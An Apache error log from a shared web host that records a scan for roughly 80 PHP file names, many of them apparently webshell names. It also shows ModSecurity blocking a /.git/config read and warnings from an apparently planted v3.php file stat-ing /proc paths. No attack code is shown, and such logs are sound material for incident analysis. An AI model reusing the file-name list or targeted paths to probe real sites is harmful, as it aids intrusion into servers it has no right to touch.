[Mon May 11 21:12:44.810151 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/1.php
[Mon May 11 21:12:44.908665 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/bak.php
[Mon May 11 21:12:44.999147 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/ini.php
[Mon May 11 21:12:45.088483 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/mail.php
[Mon May 11 21:12:45.177859 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/dlu.php
[Mon May 11 21:12:45.268201 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/zde.php
[Mon May 11 21:12:45.357788 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/ifm.php
[Mon May 11 21:12:45.448649 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/redi.php
[Mon May 11 21:12:45.538004 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/fns.php
[Mon May 11 21:12:45.627475 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/pent.php
[Mon May 11 21:12:45.716897 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/wsx.php
[Mon May 11 21:12:45.806565 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/r79.php
[Mon May 11 21:12:45.896799 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/mpxct.php
[Mon May 11 21:12:45.986113 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/x3.php
[Mon May 11 21:12:46.079270 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/wan.php
[Mon May 11 21:12:46.168577 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/iov.php
[Mon May 11 21:12:46.257872 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/ouh.php
[Mon May 11 21:12:46.347145 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/asgtt.php
[Mon May 11 21:12:46.436384 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/image.php
[Mon May 11 21:12:46.526145 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/wok.php
[Mon May 11 21:12:46.620292 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/alexus.php
[Mon May 11 21:12:46.710493 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/sadis.php
[Mon May 11 21:12:46.799821 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/admir.php
[Mon May 11 21:12:46.900228 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/file52.php
[Mon May 11 21:12:46.989469 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/133.php
[Mon May 11 21:12:47.080477 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/x0.php
[Mon May 11 21:12:47.181717 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/wsr2.php
[Mon May 11 21:12:47.270924 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/wolv.php
[Mon May 11 21:12:47.360192 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/av.php.php
[Mon May 11 21:12:47.449444 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/pn.php
[Mon May 11 21:12:47.538603 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/system_log.php
[Mon May 11 21:12:47.719816 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/media.php
[Mon May 11 21:12:47.809352 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/menu.php
[Mon May 11 21:12:47.990050 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/02.php
[Mon May 11 21:12:48.079370 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/lv.php
[Mon May 11 21:12:48.168810 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/atomlib.php
[Mon May 11 21:12:48.257998 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/cc.php
[Mon May 11 21:12:48.347304 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/mar.php
[Mon May 11 21:12:48.437535 2026] [:error] [pid 1516058:tid 1516091] [client 172.190.142.176:28920] File does not exist: /home/pweilcom/public_html/wp-configs.php
[Mon May 11 21:12:48.719478 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/autoload_classmap.php
[Mon May 11 21:12:48.809024 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/item.php
[Mon May 11 21:12:48.900842 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/jp.php
[Mon May 11 21:12:49.083046 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/fs6.php
[Mon May 11 21:12:49.172345 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/qrops.php
[Mon May 11 21:12:49.261520 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/about25.php
[Mon May 11 21:12:49.354502 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/testo.php
[Mon May 11 21:12:49.446046 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/blox.php
[Mon May 11 21:12:49.537622 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/cvrvk.php
[Mon May 11 21:12:49.630175 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/siln.php
[Mon May 11 21:12:49.728836 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/zicgg.php
[Mon May 11 21:12:49.819871 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/shelp.php
[Mon May 11 21:12:49.911602 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/puvil.php
[Mon May 11 21:12:50.003031 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/hans.php
[Mon May 11 21:12:50.096170 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/yas.php
[Mon May 11 21:12:50.190045 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/error.php
[Mon May 11 21:12:50.305128 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/wpo.php
[Mon May 11 21:12:50.409177 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/shellalfa.php
[Mon May 11 21:12:50.510297 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/owl.php
[Mon May 11 21:12:50.602493 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/n.php
[Mon May 11 21:12:50.694358 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/s.php
[Mon May 11 21:12:50.787398 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/cong.php
[Mon May 11 21:12:50.879719 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/css.php
[Mon May 11 21:12:50.973093 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/ee.php
[Mon May 11 21:12:51.065619 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/6.php
[Mon May 11 21:12:51.179391 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/ab.php
[Mon May 11 21:12:51.271426 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/222.php
[Mon May 11 21:12:51.366780 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/abcd.php
[Mon May 11 21:12:51.461802 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/enclas.php
[Mon May 11 21:12:51.555214 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/alfa.php
[Mon May 11 21:12:51.652261 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/we.php
[Mon May 11 21:12:51.745071 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/fe5.php
[Mon May 11 21:12:51.837672 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/tgrs.php
[Mon May 11 21:12:51.932438 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/ut.php
[Mon May 11 21:12:52.027467 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/a3.php
[Mon May 11 21:12:52.122683 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/aa.php
[Mon May 11 21:12:52.216763 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/3.php
[Mon May 11 21:12:52.308582 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/f6.php
[Mon May 11 21:12:52.400867 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/rrr.php
[Mon May 11 21:12:52.492880 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/usep.php
[Mon May 11 21:12:52.585940 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/0x.php
[Mon May 11 21:12:52.684546 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/goat.php
[Mon May 11 21:12:52.778117 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/123.php
[Mon May 11 21:12:52.866706 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/taktak.php
[Mon May 11 21:12:52.957970 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/gt.php
[Mon May 11 21:12:53.049925 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/aghbvr.php
[Mon May 11 21:12:53.143350 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/miso.php
[Mon May 11 21:12:53.235270 2026] [:error] [pid 1534836:tid 1534886] [client 172.190.142.176:29324] File does not exist: /home/pweilcom/public_html/naxc.php
[Mon May 11 21:12:54.427373 2026] [security2:error] [pid 1502013:tid 1502034] [client 43.157.20.63:34854] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/"] [unique_id "agIqNpYn-x0CHsbEbP2y7gAAAIU"]
[Mon May 11 21:13:03.238556 2026] [:error] [pid 1502013:tid 1502045] [client 185.238.231.73:53467] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:13:36.658837 2026] [security2:error] [pid 1501831:tid 1501844] [client 43.133.253.253:51396] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.domaine-de-janasse.com"] [uri "/"] [unique_id "agIqYFNddpkriGUb6ZV-QgAAAQs"]
[Mon May 11 21:14:23.923876 2026] [:error] [pid 1511173:tid 1511200] [client 114.119.136.64:33997] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=index&rp=/knowledgebase/3/Telephonie&systpl=six&language=romanian
[Mon May 11 21:15:32.289495 2026] [ssl:error] [pid 1511173:tid 1511194] (EAI 2)Name or service not known: [client 54.216.212.57:43398] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:15:32.289776 2026] [ssl:error] [pid 1511173:tid 1511194] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/27/task/27/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/27/task/27/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/27/task/27/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/27/task/27/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/27/task/27/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/27/task/27/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:16:09.171355 2026] [:error] [pid 1516058:tid 1516103] [client 114.119.146.171:31835] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/post-sitemap.xml
[Mon May 11 21:16:16.819805 2026] [security2:error] [pid 1502013:tid 1502039] [client 43.157.175.122:49982] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/mentions-legales/1"] [unique_id "agIrAJYn-x0CHsbEbP2z2gAAAIw"]
[Mon May 11 21:16:16.825017 2026] [security2:error] [pid 1501883:tid 1501890] [client 124.156.157.91:39780] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/"] [unique_id "agIrADP5Q_-MBliRCAxwIQAAAAU"]
[Mon May 11 21:16:16.928918 2026] [security2:error] [pid 1502013:tid 1502034] [client 43.166.255.122:40094] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agIrAJYn-x0CHsbEbP2z2wAAAIU"]
[Mon May 11 21:16:17.496229 2026] [security2:error] [pid 1501883:tid 1501907] [client 34.65.58.9:36876] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.habilis.space"] [uri "/.git/config"] [unique_id "agIrATP5Q_-MBliRCAxwIgAAABY"]
[Mon May 11 21:16:17.496460 2026] [security2:error] [pid 1501883:tid 1501907] [client 34.65.58.9:36876] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.habilis.space"] [uri "/.git/config"] [unique_id "agIrATP5Q_-MBliRCAxwIgAAABY"]
[Mon May 11 21:16:17.496675 2026] [security2:error] [pid 1501883:tid 1501907] [client 34.65.58.9:36876] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.habilis.space"] [uri "/403.shtml"] [unique_id "agIrATP5Q_-MBliRCAxwIgAAABY"]
[Mon May 11 21:16:22.259178 2026] [security2:error] [pid 1501883:tid 1501895] [client 43.166.255.122:42616] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pour-la-scene/"] [unique_id "agIrBjP5Q_-MBliRCAxwJAAAAAo"], referer: https://www.maelbailly.fr/?p=46
PHP Warning:  filesize(): stat failed for /proc/1704456/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704456/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704456/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704456/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704456/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704456/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704203/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704203/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704203/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704203/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704203/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704203/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2328390/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2328390/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2328390/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2328390/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/2328390/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/2328390/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:16:32.093586 2026] [core:error] [pid 1501883:tid 1501885] [client 74.7.228.6:42146] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:16:32.093626 2026] [core:error] [pid 1501883:tid 1501885] [client 74.7.228.6:42146] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/14/task/14/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/14/task/14/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/14/task/14/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/14/task/14/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/14/task/14/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/14/task/14/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:16:35.673466 2026] [core:error] [pid 1502013:tid 1502066] [client 74.7.230.14:53518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:16:35.673498 2026] [core:error] [pid 1502013:tid 1502066] [client 74.7.230.14:53518] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:16:35.682009 2026] [core:error] [pid 1501831:tid 1501845] [client 74.7.244.35:44584] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:16:35.682134 2026] [core:error] [pid 1501831:tid 1501845] [client 74.7.244.35:44584] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:16:38.829293 2026] [security2:error] [pid 1516058:tid 1516104] [client 43.165.174.53:60428] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/simple-ronde/"] [unique_id "agIrFiMeXtzav-mi9Sy6YwAAAM4"]
[Mon May 11 21:16:39.718468 2026] [authz_core:error] [pid 1534836:tid 1534879] [client 47.128.28.169:39974] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/PHPMailer/error_log
[Mon May 11 21:16:53.303393 2026] [security2:error] [pid 1501831:tid 1501855] [client 43.157.147.3:56226] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIrJVNddpkriGUb6ZV-8wAAARY"]
[Mon May 11 21:17:13.009472 2026] [security2:error] [pid 1516058:tid 1516111] [client 129.226.94.18:45720] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/downloads/Affiche_Apoe-2026-04.pdf"] [unique_id "agIrOSMeXtzav-mi9Sy6iwAAANU"]
